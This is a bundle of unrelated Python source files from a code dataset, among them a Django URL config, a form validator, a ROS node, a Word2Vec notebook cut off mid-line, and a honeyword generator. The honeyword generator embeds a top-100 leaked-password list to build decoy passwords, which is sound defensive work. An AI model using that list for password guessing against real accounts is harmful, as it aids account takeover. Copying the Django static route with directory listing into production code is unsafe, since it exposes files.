whyo))\n\t\n\twork('John', 'restaurant', 'eat', 'food')\n\twork('Sam', 'restaurant', 'meet', 'friend')\n\twork('Naiyana', 'salon', 'wash', 'hair')\n\twork('Juan', 'salon', 'cut', 'hair')\n\twork('John', 'salon', 'get', 'pedicure')\n\twork('Sam', 'salon', 'get', 'manicure')\n\twork('Sam', 'market', 'buy', 'food')\n\twork('Naiyana', 'mall', 'shop')\n\twork('Juan', 'pharmacy', 'buy', 'medicine')\n\twork('Juan', 'cinema', 'watch', 'movie')\n\twork('Sam', 'doctor', 'get', 'checkup')\n\twork('Juan', 'doctor', 'fix', 'headache')\n\twork('Naiyana', 'doctor', 'test', 'covid')\n\twork('you', 'hospital', 'visit', 'friend')\n\twork('I', 'clinic', 'see', 'doctor')\n\twork('Sam', 'clinic', 'see', 'dentist')\n\twork('Sam', 'dentist', 'clean', 'teeth')\n\twork('Naiyana', 'dentist', 'get', 'filling')\n\twork('John', 'dentist', 'get', 'whitening')\n\twork('Juan', 'dentist', 'fix', 'toothache')\n\twork('you', 'dentist', 
'remove', 'tooth')\n\twork('I', 'dentist', 'get', 'braces')\n\t\n\tdef work(who, which, period):\n\t\tClaw(who, 'go').modify('when', Node(period).modify('which', which))\n\t\n\twork('Sam', 'this', 'morning') \n\twork('Joe', 'this', 'afternoon') \n\twork('Nid', 'this', 'evening') \n\twork('Nui', 'last', 'week') \n\twork('Sam', 'this', 'week') \n\twork('Joe', 'next', 'week') \n\twork('Nid', 'last', 'month') \n\twork('Nui', 'this', 'month') \n\twork('Sam', 'next', 'month') \n\twork('Joe', 'last', 'year') \n\twork('Nid', 'this', 'year') \n\twork('Nui', 'next', 'year') \n\n\tClaw('Nui', 'go').modify('when', 'now')\n\tClaw('Sam', 'go').modify('when', 'yesterday')\n\tClaw('Joe', 'go').modify('when', 'today')\n\tClaw('Nid', 'go').modify('when', 'tomorrow')\n\n\t# where and how: local vs distant destinations and mode of travel\n\tdef work(who, where, how):\n\t\tClaw(who, 'go').modify('where', where).modify('how', how)\n\t\n\twork('Nui', 'Bangkok', 'train') \n\twork('Nid', 'Chiang_Mai', 'bus') \n\twork('Joe', 'Udon_Thani', 'airplane') \n\twork('Sam', 'Koh_Samui', 'ship') \n\t\n\twork('Joe', 'bank' , 'car') \n\twork('Nid', 'coffeeshop', 'Grab') \n\twork('Nui', 'restaurant', 'taxi') \n\twork('Sam', 'salon' , 'citybus') \n\twork('Joe', 'market' , 'songtaew')\n\twork('Nid', 'mall' , 'tuktuk') \n\t\t \n\tClaw('Sam', 'go').modify('where', 'dentist').modify('how', 'run')\n\tClaw('Joe', 'go').modify('where', 'clinic').modify('how', 'walk')\n\n\tdef work(who, where, how):\n\t\tClaw(who, 'go').modify('where', where).modify('how', Claw('by', how))\n\t\n\t# you do what?\n\n\tClaw('Sam', 'eat', 'rice')\n\tClaw('Joe', 'cook', 'food')\n\tClaw('Nid', 'brew', 'coffee')\n\tClaw('Nui', 'brew', 'tea')\n\tClaw('Sam', 'read', 'book')\n\tClaw('Joe', 'watch', 'movie')\n\tClaw('Nid', 'listen', 'music')\n\tClaw('Joe', 'play', 'game')\n\n\t#chat online\n\t#homework\n\t#work on computer\n\t#work in garden\n\n\tClaw('Sam', 'eat', 'rice').modify('where', Node('house'))\n\tClaw('Joe', 'cook', 'food').modify('where', Node('house').modify('of', 'friend'))\n\tClaw('Nid', 'cook', 'food').modify('where', 'kitchen')\n\tClaw('Joe', 'brew', 'coffee').modify('where', 'backyard')\n\n\tClaw('Nid', 'read', 'book').modify('where', 'upstairs')\n\tClaw('Nui', 'listen', 'music').modify('where', 'bedroom')\n\tClaw('Sam', 'watch', 'movie').modify('where', 'livingroom')\n\tClaw('Nid', 'play', 'game').modify('where', 'backyard')\n\n\t# Why\n\tClaw('Nid', 'cook', 'food').modify('why', Claw(Node('family').modify('of', 'Nid'), 'is', 'hungry'))\n\n\tClaw('Joe', 'brew', 'coffee').modify('why', Claw('Joe', 'relax'))\n\tClaw('Joe', 'brew', 'coffee').modify('why', Claw('Joe','give','friend'))\n\tClaw('Nid', 'read', 'book').modify('why', Claw('Nid', 'have', 'fun'))\n\tClaw('Penny', 'chat', 'online').modify('why', Claw('Penny', 'talk', 'friend'))\n\n\tClaw('Bella', 'do', 'homework').modify( 'why', Claw( 'assignment', 'is', 'due').modify('when', 'tomorrow'))\n\tClaw('Pin', 'do', 'homework').modify( 'why', Claw('Pin', 'study', 'test'))\n\tClaw('May', 'work').modify( 'where', 'computer').modify( 'why', 'job')\n\tClaw('Som', 'work').modify( 'where', 'garden').modify( 'why', Claw( 'weed', 'is', Node('many').modify('howmuch', 'too')))\n\tClaw('Milky', 'work').modify( 'where', 'garden').modify( 'why', Node('time').modify('what', 'harvest'))\n\tClaw('Chompoo', 'work').modify( 'where', 'garden').modify( 'why', Node('time').modify('what', 
'plant'))\n\n","sub_path":"python/sam/mem.py","file_name":"mem.py","file_ext":"py","file_size_in_byte":5383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"637259511","text":"\"\"\"\nEntity.py: A class representation of an entity in our world. Serves as the superclass for all interactable items.\n\"\"\"\n\nimport math\nfrom math import floor\nfrom uuid import uuid4\nfrom random import random\n\nimport pyglet \nfrom pyglet.gl import glColor4ub, glEnable, glVertexPointer, glDrawArrays, GLfloat, GL_BLEND, GL_POLYGON, GL_VERTEX_ARRAY, glEnableClientState, GL_FLOAT\n\nfrom Util.Vector2 import Vector2\n\nclass Entity(object):\n def __init__(self, **kwargs):\n self.id = uuid4()\n self.color = kwargs.get('color', (int(random() * 255), int(random() * 255), int(random() * 255), 255))\n self.position = kwargs.get('position', Vector2(x = 0, y = 0))\n self.orientation = kwargs.get('orientation', 0)\n self.z_index = kwargs.get('z_index', 0)\n self.vertices = kwargs.get('vertices', [])\n self.abs_vertices = self.get_abs_vertices()\n self.orbital_angle = kwargs.get('orbital_angle', 0)\n self.scale_factor = 1\n\n def update(self):\n self.update_abs_vertices()\n # self.update_relative_vertices()\n\n def update_abs_vertices(self):\n self.abs_vertices = self.get_abs_vertices()\n\n def get_abs_vertices(self):\n vertices = []\n for _ in self.vertices:\n rot_v = _.rotate(self.orientation)\n v = self.position.add(rot_v)\n vertices.append(v)\n\n return vertices\n\n def get_screen_relative_vertices(self, offset_x, offset_y, screen_height):\n x = self.position.x - offset_x\n y = screen_height - self.position.y + offset_y\n\n vertices = ()\n for _ in self.vertices:\n rot_v = _.rotate(self.orientation)\n vertices += (x - rot_v.x * self.scale_factor,)\n vertices += (y + rot_v.y * self.scale_factor,)\n\n\n return vertices\n\n def get_screen_relative_vertices_vectors(self, offset_x, offset_y, screen_height):\n vertices = self.get_screen_relative_vertices(offset_x, offset_y, screen_height)\n\n vectors = [Vector2(x=vertices[i], y=vertices[i+1]) for i in xrange(0, len(vertices), 2)]\n\n return vectors\n\n def draw(self, offset_x, offset_y, screen_height):\n vertices = self.get_screen_relative_vertices(offset_x, offset_y, screen_height)\n \n # get opengl vertices of type GLfloat\n vertices_gl = (GLfloat * len(vertices))(*vertices)\n\n # set the color\n glColor4ub(*self.color);\n\n # turn on blend for alpha channel\n glEnable(GL_BLEND)\n\n # tell open GL were passing a vertex array\n glEnableClientState(GL_VERTEX_ARRAY)\n\n # create a pointer to vertices_gl\n glVertexPointer(2, GL_FLOAT, 0, vertices_gl)\n \n # draw the array\n glDrawArrays(GL_POLYGON, 0, len(vertices) // 2)\n\n # rotates the entity counter clockwise by the angle\n def rotate(self, angle):\n self.orientation += angle\n self.update()\n \n def orbit_around(self, origin, distance, angle):\n self.orbital_angle += angle\n x = origin['x'] + math.cos(self.orbital_angle * math.pi/180) * distance;\n y = origin['y'] + math.sin(self.orbital_angle * math.pi/180) * distance;\n self.position.x = x\n self.position.y = y\n self.update()\n\n def translate_vector(self, vector):\n self.position = self.position.add(vector)\n self.update()\n\n def translate(self, x, y):\n self.translate_vector(Vector2(x = x, y = y))\n self.update()\n\n def scale(self, factor):\n self.scale_factor = factor\n self.update()\n\n def set_position(self, position_vector):\n self.position = position_vector\n 
self.update()\n","sub_path":"atlas/Entity/Entity.py","file_name":"Entity.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"447942123","text":"# What is the 10 001st prime number?\r\ndef isPrime(n):\r\n if (n <= 1):\r\n return False\r\n if (n <= 3):\r\n return True\r\n if (n % 2 == 0 or n % 3 == 0):\r\n return False\r\n i = 5\r\n while(i * i <= n):\r\n if (n % i == 0 or n % (i + 2) == 0):\r\n return False\r\n i = i + 6\r\n return True\r\n\r\nindex = 0\r\nfor i in range(1, 9999999):\r\n if(isPrime(i)):\r\n index += 1\r\n if (index == 10001):\r\n print(i)","sub_path":"7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"74894621","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls.defaults import *\nfrom django.conf import settings\nfrom django.contrib import admin\n\nfrom tastypie.api import Api\n\nfrom hitcount.views import update_hit_count_ajax\n\nfrom minusstore.forms import MinusSearchForm\nfrom minusstore.feeds import LatestArivals\nfrom minusstore.api import MinusRecordResource, MinusAuthorResouce, MinusWeekStatsResource\n\nv1_api = Api(api_name='v1')\nv1_api.register(MinusRecordResource())\nv1_api.register(MinusAuthorResouce())\nv1_api.register(MinusWeekStatsResource())\n\n\nfeeds = {\n 'latest': LatestArivals,\n}\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^minus/', include('minusstore.urls')),\n url(r'^news/', include('news.urls')),\n url(r'^$', 'news.views.news_index'),\n url(r'^blurb/', include('blurbs.urls')),\n url(r'^contest/', include('vocal_contest.urls')),\n url(r'', include('registration.backends.default.urls')),\n url(r'^messages/', include('messages.urls')),\n url(r'^users/', include('users.urls')),\n url(r'^forum/', include('forum.urls')),\n url(r'^friendship/', include('friends.urls')),\n url(r'^photo/', include('photos.urls')),\n url(r'^video/', include('videos.urls')),\n url(r'^albums/', include('albums.urls')),\n url(r'^search/', include('haystack.urls')),\n url(r'^tinymce/', include('tinymce.urls')),\n url(r'^links/', include('links.urls'),{'form_class':MinusSearchForm}),\n url(r'^captcha/', include('captcha.urls')),\n url(r'^delivery/', include('delivery.urls')),\n url(r'^radio/', include('radio.urls')),\n\n url(r'^chat/', include('chat.urls')),\n url(r'^comments/', include('django.contrib.comments.urls')),\n url(r'^feeds/(?P.*)/$', 'django.contrib.syndication.views.feed',\n {'feed_dict': feeds}, name = \"feeds\"),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^admin_tools/', include('admin_tools.urls')),\n (r'^api/', include(v1_api.urls)),\n\n url(r'^ajax/hit/$',\n update_hit_count_ajax,\n name='hitcount_update_ajax'),\n\n url(r'^static/(?P.*)$', 'django.views.static.serve',\n {'document_root': settings.MEDIA_ROOT, 'show_indexes':True}),\n)\n","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"590886299","text":"n = int(input())\nlista = []\nscomp = 0\nncomp = 0\nfor i in range(n):\n n2 = input().split(\" \")\n if(n2[0] == '+'):\n scomp = scomp + 1\n if(n2[0] == '-'):\n ncomp = ncomp + 1\n lista.append(n2[1])\nlista = sorted(lista)\nfor i in range(n):\n print(lista[i])\nprint(\"Se comportaram: %d | Nao se comportaram: %d\" %(scomp,ncomp)) 
\n","sub_path":"URIonlineJudge/Codes/Python/2479.py","file_name":"2479.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"344556046","text":"# -*- coding:utf-8 -*-\n\nimport re\n\n\n_re_int = re.compile(\"^\\-?\\d+$\")\n_re_float = re.compile(\"^(\\-?\\d+)(\\.\\d+)?$\")\n_re_email = re.compile(\n \"^([A-Z0-9]+[_|\\_|\\.]?)*[A-Z0-9]+@([A-Z0-9]+[_|\\_|\\.]?)*[A-Z0-9]+\\.[A-Z]{2,3}$\",\n re.I)\n_re_letter_number = re.compile(\"^[\\dA-Z]+$\", re.I)\n\n_message_format = {\n \"required\": \"{}不能为空\",\n \"valid_email\": \"{}格式错误\",\n \"min_length\": \"{}长度不能小于{}\",\n \"max_length\": \"{}长度不能大于{}\",\n \"exact_length\": \"{}长度不是{}\",\n \"matches\": \"{}不一致\",\n \"numeric\": \"{}不是数值\",\n \"integer\": \"{}不是整数\",\n \"greater_than_or_equal\": \"{}不能小于{}\",\n \"greater_than\": \"{}不能小于等于{}\",\n \"less_than_or_equal\": \"{}不能大于{}\",\n \"less_than\": \"{}不能大于等于{}\"\n}\n\n\ndef is_int(value):\n u\"\"\"是否整型\n\n Parameters\n ----------\n value : str\n 数值\n\n Returns\n -------\n bool\n\n Notes\n -----\n str.isdigit() 是否只由数字组成,“-”、“.”也不包括\n\n \"\"\"\n if _re_int.match(str(value)):\n return True\n else:\n return False\n\n\ndef is_float(value):\n u\"\"\"是否浮点型\n\n Parameters\n ----------\n value : str\n 数值\n\n Returns\n -------\n bool\n\n \"\"\"\n if _re_float.match(str(value)):\n return True\n else:\n return False\n\n\ndef is_email(value):\n u\"\"\"是否邮件\n\n Parameters\n ----------\n value : str\n 邮件地址\n\n Returns\n -------\n bool\n\n \"\"\"\n if _re_email.match(str(value)):\n return True\n else:\n return False\n\n\ndef only_letters_and_numbers(value):\n u\"\"\"只包含字母、数字\"\"\"\n if _re_letter_number.match(value):\n return True\n else:\n return False\n\n\ndef verify(rules, message_format={}):\n u\"\"\"验证\n\n Parameters\n ----------\n rules : [{str : str}]\n 规则\n\n name : str\n 字段名\n rule : {\n \"required\",\n \"valid_email\",\n \"min_length[x]\",\n \"max_length[x]\",\n \"exact_length[x]\",\n \"matches[x]\",\n \"numeric\",\n \"integer\",\n \"greater_than_or_equal[x]\",\n \"greater_than[x]\",\n \"less_than_or_equal[x]\",\n \"less_than[x]\"}\n 字段规则,x 为比较的值\n value : str\n 字段值\n message_format : dict, optional, default={}\n 错误信息\n\n 默认的错误信息\n {\n \"required\": \"{}不能为空\",\n \"valid_email\": \"{}格式错误\",\n \"min_length\": \"{}长度不能小于{}\",\n \"max_length\": \"{}长度不能大于{}\",\n \"exact_length\": \"{}长度不是{}\",\n \"matches\": \"{}不一致\",\n \"numeric\": \"{}不是数值\",\n \"integer\": \"{}不是整数\",\n \"greater_than_or_equal\": \"{}不能小于{}\",\n \"greater_than\": \"{}不能小于等于{}\",\n \"less_than_or_equal\": \"{}不能大于{}\",\n \"less_than\": \"{}不能大于等于{}\"\n }\n\n Returns\n -------\n {str, None}\n 返回错误信息或 None\n\n \"\"\"\n for item in rules:\n rule = item.get(\"rule\")\n name = item.get(\"name\")\n value = item.get(\"value\")\n\n rule_name = rule.split(\"[\")[0]\n if rule == rule_name:\n rule_value = None\n else:\n rule_value = rule.split(\"[\")[1].split(\"]\")[0]\n\n message_exists = False\n\n if rule_name == \"required\":\n if value == \"\":\n message_exists = True\n elif rule_name == \"valid_email\":\n if not is_email(value):\n message_exists = True\n elif rule_name == \"numeric\":\n if not is_float(value):\n message_exists = True\n elif rule_name == \"integer\":\n if not is_int(value):\n message_exists = True\n elif rule_name == \"min_length\":\n if len(value) < int(rule_value):\n message_exists = True\n elif rule_name == \"max_length\":\n if len(value) > int(rule_value):\n message_exists = True\n elif rule_name == \"exact_length\":\n if 
len(value) != int(rule_value):\n message_exists = True\n elif rule_name == \"matches\":\n if value != rule_value:\n message_exists = True\n elif rule_name == \"greater_than_or_equal\":\n if float(value) < float(rule_value):\n message_exists = True\n elif rule_name == \"greater_than\":\n if float(value) <= float(rule_value):\n message_exists = True\n elif rule_name == \"less_than_or_equal\":\n if float(value) > float(rule_value):\n message_exists = True\n elif rule_name == \"less_than\":\n if float(value) >= float(rule_value):\n message_exists = True\n\n if message_exists:\n if rule_name in message_format:\n msg_format = message_format[rule_name]\n else:\n msg_format = _message_format[rule_name]\n\n if msg_format.count(\"{}\") == 2:\n return msg_format.format(name, rule_value)\n else:\n return msg_format.format(name)\n\n return None\n\n\ndef verify_page(page, row, extend=None, message_format={}):\n u\"\"\"验证分页\n\n Parameters\n ----------\n page : int\n 页码\n row : int\n 每页数据数\n extend : [{str : str}]\n 扩展规则\n\n name : str\n 字段名\n rule : {\n \"required\",\n \"valid_email\",\n \"min_length[x]\",\n \"max_length[x]\",\n \"exact_length[x]\",\n \"matches[x]\",\n \"numeric\",\n \"integer\",\n \"greater_than_or_equal[x]\",\n \"greater_than[x]\",\n \"less_than_or_equal[x]\",\n \"less_than[x]\"}\n 字段规则,x 为比较的值\n value : str\n 字段值\n message_format : dict, optional, default={}\n 错误信息\n\n 默认的错误信息\n {\n \"required\": \"{}不能为空\",\n \"valid_email\": \"{}格式错误\",\n \"min_length\": \"{}长度不能小于{}\",\n \"max_length\": \"{}长度不能大于{}\",\n \"exact_length\": \"{}长度不是{}\",\n \"matches\": \"{}不一致\",\n \"numeric\": \"{}不是数值\",\n \"integer\": \"{}不是整数\",\n \"greater_than_or_equal\": \"{}不能小于{}\",\n \"greater_than\": \"{}不能小于等于{}\",\n \"less_than_or_equal\": \"{}不能大于{}\",\n \"less_than\": \"{}不能大于等于{}\"\n }\n\n Returns\n -------\n {str, None}\n\n \"\"\"\n rules = [\n {\n \"name\": \"page\",\n \"rule\": \"numeric\",\n \"value\": page\n },\n {\n \"name\": \"row\",\n \"rule\": \"numeric\",\n \"value\": row\n },\n {\n \"name\": \"page\",\n \"rule\": \"greater_than[0]\",\n \"value\": page\n },\n {\n \"name\": \"row\",\n \"rule\": \"greater_than[0]\",\n \"value\": row\n }\n ]\n\n if extend is not None:\n rules += extend\n\n return verify(rules, message_format)\n","sub_path":"nlptools/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":7339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"297704730","text":"#!/usr/bin/env python2.7\n\nimport rospy\nimport tf\nfrom std_msgs.msg import Float64\n\n\nclass PoseNode(object):\n '''Node responsible for republishing X and Y components of pose on independent topics for PID\n controllers'''\n\n def __init__(self, transform_target='world', transform_source='base_link'):\n self.transform_target = transform_target\n self.transform_source = transform_source\n self.pub_x = rospy.Publisher('x_pid', Float64, queue_size=10)\n self.pub_y = rospy.Publisher('y_pid', Float64, queue_size=10)\n self.listen = tf.TransformListener()\n\n def broadcaster(self):\n '''Listen for pose transform and republish coordinates once'''\n try:\n pos, _ = self.listen.lookupTransform(self.transform_target, self.transform_source,\n rospy.Time(0))\n self.pub_x.publish(pos[0])\n self.pub_y.publish(pos[1])\n except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException) as err:\n rospy.logerr(\"Failed to lookup transform between {} and {}! 
Got error: {}\".format(\n self.transform_source, self.transform_target, err))\n\n def wait(self):\n '''Wait for the pose transform to start publishing'''\n rospy.loginfo('Waiting for transform...')\n self.listen.waitForTransform(self.transform_target, self.transform_source, rospy.Time(),\n rospy.Duration(5))\n\n\nif __name__ == '__main__':\n rospy.init_node('pose_node')\n P = PoseNode()\n P.wait()\n while not rospy.is_shutdown():\n P.broadcaster()\n","sub_path":"pose_node.py","file_name":"pose_node.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"547126917","text":"from random import randint\r\n\r\ntop100 = [\r\n '123456',\r\n '12345',\r\n '123456789',\r\n 'password',\r\n 'iloveyou',\r\n 'princess',\r\n '1234567',\r\n 'rockyou',\r\n '12345678',\r\n 'abc123',\r\n 'nicole',\r\n 'daniel',\r\n 'babygirl',\r\n 'monkey',\r\n 'lovely',\r\n 'jessica',\r\n '654321',\r\n 'michael',\r\n 'ashley',\r\n 'qwerty',\r\n '111111',\r\n 'iloveu',\r\n '000000',\r\n 'michelle',\r\n 'tigger',\r\n 'sunshine',\r\n 'chocolate',\r\n 'password1',\r\n 'soccer',\r\n 'anthony',\r\n 'friends',\r\n 'butterfly',\r\n 'purple',\r\n 'angel',\r\n 'jordan',\r\n 'liverpool',\r\n 'justin',\r\n 'loveme',\r\n 'fuckyou',\r\n '123123',\r\n 'football',\r\n 'secret',\r\n 'andrea',\r\n 'carlos',\r\n 'jennifer',\r\n 'joshua',\r\n 'bubbles',\r\n '1234567890',\r\n 'superman',\r\n 'hannah',\r\n 'amanda',\r\n 'loveyou',\r\n 'pretty',\r\n 'basketball',\r\n 'andrew',\r\n 'angels',\r\n 'tweety',\r\n 'flower',\r\n 'playboy',\r\n 'hello',\r\n 'elizabeth',\r\n 'hottie',\r\n 'tinkerbell',\r\n 'charlie',\r\n 'samantha',\r\n 'barbie',\r\n 'chelsea',\r\n 'lovers',\r\n 'teamo',\r\n 'jasmine',\r\n 'brandon',\r\n '666666',\r\n 'shadow',\r\n 'melissa',\r\n 'eminem',\r\n 'matthew',\r\n 'robert',\r\n 'danielle',\r\n 'forever',\r\n 'family',\r\n 'jonathan',\r\n '987654321',\r\n 'computer',\r\n 'whatever',\r\n 'dragon',\r\n 'vanessa',\r\n 'cookie',\r\n 'naruto',\r\n 'summer',\r\n 'sweety',\r\n 'spongebob',\r\n 'joseph',\r\n 'junior',\r\n 'softball',\r\n 'taylor',\r\n 'yellow',\r\n 'daniela',\r\n 'lauren',\r\n 'mickey',\r\n 'princesa']\r\n \r\ndef symbol_suffix():\r\n \"\"\"\r\n adds a random common string to the end of a password\r\n \"\"\"\r\n r = randint(1,100)\r\n password = top100[r]\r\n special_symbol = [33,35,36,38,42,63]\r\n length = len(special_symbol)-1\r\n rand = randint(0,length)\r\n suffix = chr(special_symbol[rand])\r\n honeyword = password + suffix\r\n return honeyword\r\n\r\n#print symbol_suffix()\r\n","sub_path":"symbol_suffix.py","file_name":"symbol_suffix.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"82213099","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## A Dense Neural network with Word2Vec embedding trained on pubmed abstracts\n\n# In[1]:\n\n\nimport torch\nimport torch.nn as nn\nimport numpy as np\nfrom torch.utils.data import Dataset, DataLoader\nimport gensim.models as word2vec\nimport pandas as pd\nimport os\nfrom tqdm import tqdm\nimport time\nimport random\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom torch.utils.data.sampler import SequentialSampler\nimport pickle\n\n\n# In[2]:\n\n\n# Reproducibility\nmanualSeed = 42\n\nnp.random.seed(manualSeed)\nrandom.seed(manualSeed)\ntorch.manual_seed(manualSeed)\n# if you are suing GPU\nprint(\"Torch is available:\",torch.cuda.is_available())\nif 
torch.cuda.is_available():\n torch.cuda.manual_seed(manualSeed)\n torch.cuda.manual_seed_all(manualSeed)\n\n\n torch.backends.cudnn.enabled = False \n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n\n\n# In[3]:\n\n\nprint (os.getcwd())\nos.chdir('')\nprint (os.getcwd())\n\n\n# In[4]:\n\n\nembedding = \"data/embeddings/pubmed_s100w10_min.bin\"\ndata = \"\"\n\n\n# In[5]:\n\n\n\n# #Load pretrained model (since intermediate data is not included, the model cannot be refined with additional data)\n# #model = Word2Vec.load_word2vec_format('GoogleNews-vectors-negative300.bin', binary=True, norm_only=True)\n\n\n# import gensim\n# model = word2vec.KeyedVectors.load_word2vec_format(embedding, binary=True)\n\n# # Deal with an out of dictionary word: Михаил (Michail)\n# if 'cholangiocarcinoma' in model:\n# print(model['cholangiocarcinoma'].shape)\n# else:\n# print('{0} is an out of dictionary word'.format('cholangiocarcinoma'))\n \n# print(model.most_similar(positive=['woman', 'king'], negative=['man']))\n\n# print(model.doesnt_match(\"breakfast cereal dinner lunch\".split()))\n\n# print(model.similarity('woman', 'man'))\n\n# print(model.most_similar('cholangiocarcinoma'))\n# print(model.most_similar('Tamoxifen'))\n\n\n# ### DataLoader Class\n\n# In[6]:\n\n\nimport src.data.DataLoader as CustomDataLoader\nfrom src.features.CustomTokenizer import CustomTokenizer\n\n\n# In[7]:\n\n\nmaxSentenceLen = 15\nembedDim = 100\ntrain_split = .7\nvalidation_split = .2\ntest_split = .1\n\n\n# ### MESSY LOADER : TODO CLEANUPS\n\n# In[8]:\n\n\nclass ClinicalSTS(Dataset):\n ''' Class to Load STS data '''\n \n def __init__(self, typeData):\n \n zeroTensor = torch.zeros(100)\n \n ''' Load Pretrained Word2Vec Model '''\n preTrainedWord2Vec = word2vec.KeyedVectors.load_word2vec_format(embedding, binary=True)\n\n ''' Load the data from the file '''\n #data = pd.read_csv(file, delimiter=\"\\t\", header=None,names=['a','b','score'])\n #fullData = np.loadtxt(data, delimiter='\\t')\n pairs = CustomDataLoader.DataLoader()\n # Pairs will have the whole data in list of tupples {a, b, score}\n# print (len(pairs))\n# print (pairs[3][0], pairs[3][1],pairs[3][2])\n# print(CustomTokenizer(pairs[3][0]))\n# print(CustomTokenizer(pairs[3][1]))\n# print(pairs[3][2])\n\n #TODO: Provide full data\n textData = pairs\n self.dataSize = len(textData)\n #print (self.dataSize)\n #self.len = self.dataSize\n \n ''' Get the Tokenization and embeddings '''\n aData = []\n bData = []\n labels = []\n for eachData in tqdm(textData):\n a = CustomTokenizer(eachData[0])\n b = CustomTokenizer(eachData[1])\n label = float(eachData[2])\n aEmbed = []\n bEmbed = []\n for eachToken in a:\n if eachToken in preTrainedWord2Vec:\n aEmbed.append(preTrainedWord2Vec[eachToken])\n else:\n if \" \" in eachToken:\n for splitEachToken in eachToken.split():\n aEmbed.append(preTrainedWord2Vec[splitEachToken])\n else:\n print(\"A:\",eachToken)\n \n if len(aEmbed) < maxSentenceLen:\n aEmbed += [zeroTensor] * (maxSentenceLen - len(aEmbed))\n elif len(aEmbed) > maxSentenceLen:\n aEmbed = aEmbed[:maxSentenceLen]\n \n for eachToken in b:\n if eachToken in preTrainedWord2Vec:\n bEmbed.append(preTrainedWord2Vec[eachToken])\n else:\n if \" \" in eachToken:\n for splitEachToken in eachToken.split():\n bEmbed.append(preTrainedWord2Vec[splitEachToken])\n else:\n print(\"B:\",eachToken)\n \n if len(bEmbed) < maxSentenceLen:\n bEmbed += [zeroTensor] * (maxSentenceLen - len(bEmbed))\n elif len(bEmbed) > maxSentenceLen:\n bEmbed = bEmbed[:maxSentenceLen]\n 
\n        aData.append(aEmbed)\n        bData.append(bEmbed)\n        labels.append(label)\n        \n        \n        #Check shapes and sizes\n        print (len(aData), len(bData), len(labels))\n        print (len(aData[3]), len (bData[3]), len (aData[3][0]),type(aData[3][0]))\n        \n        ''' Convert to Tensors'''\n        aDataTensor = torch.FloatTensor(aData)\n        bDataTensor = torch.FloatTensor(bData)\n        labels = torch.FloatTensor(labels)\n        print (aDataTensor.shape, bDataTensor.shape, labels.shape)\n        \n        xData = torch.cat((aDataTensor,bDataTensor),1)\n        print (xData.shape)\n        \n        splitVal = int(np.floor(validation_split * self.dataSize))\n        splitTest = int(np.floor(test_split * self.dataSize))\n        splitTrain = xData.shape[0] - (splitVal + splitTest)\n#         self.xVal, self.yVal = xData[:splitVal], labels[:splitVal]\n#         self.xTest, self.yTest = xData[splitVal: splitVal+splitTest], labels[splitVal: splitVal+splitTest]\n#         self.xTrain, self.yTrain = xData[splitVal+splitTest:], labels[splitVal+splitTest:]\n        self.xVal, self.yVal = xData[splitTrain:splitTrain+splitVal], labels[splitTrain:splitTrain+splitVal]\n        self.xTest, self.yTest = xData[splitTrain+splitVal:], labels[splitTrain+splitVal:]\n        self.xTrain, self.yTrain = xData[:splitTrain], labels[:splitTrain]\n        \n        print (len(self.xTrain),len(self.xVal),len(self.xTest))\n        print (splitVal, splitTest)\n        \n        if typeData == \"train\":\n            self.xData = self.xTrain\n            self.labels = self.yTrain\n        elif typeData == \"test\":\n            self.xData = self.xTest\n            self.labels = self.yTest\n        else:\n            self.xData = self.xVal\n            self.labels = self.yVal\n        self.len = len(self.xData)\n        print (len(self.xData),len(self.labels))\n\n    \n    def __getitem__(self, index):\n        return self.xData[index], self.labels[index]\n    \n    def __len__(self):\n        return self.len\n\n\n# ### Define Train and Test Loader\n\n# In[9]:\n\n\nstime = time.time()\ndatasetTrain = ClinicalSTS('train')\nprint(\"Time:\",time.time()- stime)\n\nstime = time.time()\ndatasetTest = ClinicalSTS('test')\nprint(\"Time:\",time.time()- stime)\n\nstime = time.time()\ndatasetVal = ClinicalSTS('val')\nprint(\"Time:\",time.time()- stime)\n\n\n# In[10]:\n\n\nbatchSize = 64\n\ntrainLoader = torch.utils.data.DataLoader(datasetTrain, batch_size=batchSize,shuffle=False)\nvalidationLoader = torch.utils.data.DataLoader(datasetVal, batch_size=batchSize,shuffle=False)\ntestLoader = torch.utils.data.DataLoader(datasetTest, batch_size=batchSize,shuffle=False)\n\n\n# In[11]:\n\n\nprint (len(trainLoader), len(validationLoader), len(testLoader))\n\n\n# In[12]:\n\n\nprint (len(trainLoader.dataset), len(validationLoader.dataset), len(testLoader.dataset))\n\n\n# ### Model Class\n\n# In[55]:\n\n\nclass DNN(nn.Module):\n    ''' A Dense Neural Network '''\n    \n    def __init__(self):\n        super().__init__()\n        self.reducedDim = 100\n        self.modelName = \"DNN_1Lyr_cW2V\"\n        self.la = nn.Linear(maxSentenceLen*embedDim,self.reducedDim)\n        self.lb = nn.Linear(maxSentenceLen*embedDim,self.reducedDim)\n        self.l1 = nn.Linear(2*self.reducedDim,1)\n    \n    def forward(self, x):\n        \"\"\" Layer Stacking and Logic Core \"\"\"\n        print (\"Before:\",x.shape)\n        splitX = 